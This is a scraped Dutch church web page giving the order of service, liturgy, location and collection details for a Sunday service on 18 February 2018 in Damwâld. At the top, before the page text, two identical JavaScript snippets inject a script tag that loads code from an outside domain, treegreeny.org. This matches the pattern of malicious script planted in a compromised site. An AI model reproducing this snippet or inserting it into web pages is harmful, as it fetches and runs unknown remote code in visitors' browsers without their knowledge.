;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 18 februari 2018 9:30 uur - PKN Damwâld
zondag 18 februari 2018
09:30 uur
Eerste zondag 40-dagentijd

Kerkdienst zondag 18 februari 2018 9:30 uur

Thema: Bevestiging ambtsdragers

Informatie

Voorganger:Ds. J.P. Strietman, Kollumerzwaag
Organist:Jelte Cuperus
Thema:Bevestiging ambtsdragers
Mededeling:Eerste zondag 40-dagentijd
Liturgie
Lied voor de dienst Elb 374: 1, 2 en 3
Welkom en mededelingen
Aanvangslied Psalm 84: 1 en 2
Stil Gebed, Votum en Zegengroet
Lezen van de Tien Geboden .
We zingen: Psalm 17: 2 en 3
Gebed
We lezen: Psalm 134: 1-3
We zingen: Psalm 134: 1, 2 en 3
Verkondiging over : 1 Petrus 2: 4-5
We zingen: Gezang 304: 1, 2 en 3
Onderwijzing .
We zingen: Elb 118: 1, 2, 3 en 4
Afscheid van de aftredende ambtsdragers
Bevestiging van de nieuwe ambtsdragers
We zingen: Gezang 456: 1 en 2
Dankgebed en voorbede
Collecte
Slotlied : Psalm 133: 1, 2 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: 40-Dagentijd: Met je kinderen op de vlucht - IOCC Libanon

Onder de vier miljoen Syriërs die hun land zijn ontvlucht, bevinden zich veel moeders met kinderen. Uitgeput zijn ze neergestreken in de Bekaa-vallei in Oost-Libanon. Hun kinderen zijn moe, bang, ziek of zelfs ondervoed. Onder erbarmelijke omstandigheden proberen deze moeders hun kinderen liefdevol te verzorgen en te beschermen. Partnerorganisatie IOCC ( International Orthodox Christian Charities) ondersteunt gevluchte moeders daarbij. Met verloskundige zorg, voorlichting over borstvoeding, bijvoeding voor ondervoede kinderen en gezondheidsvoorlichting redden bevlogen medewerkers van IOCC niet alleen kinderlevens, maar helpen ze moeders om in alle onzekerheid hun kinderen toch de juiste zorg te kunnen bieden.

Tweede collecte: Kerk
Uitganscollecte: Kerk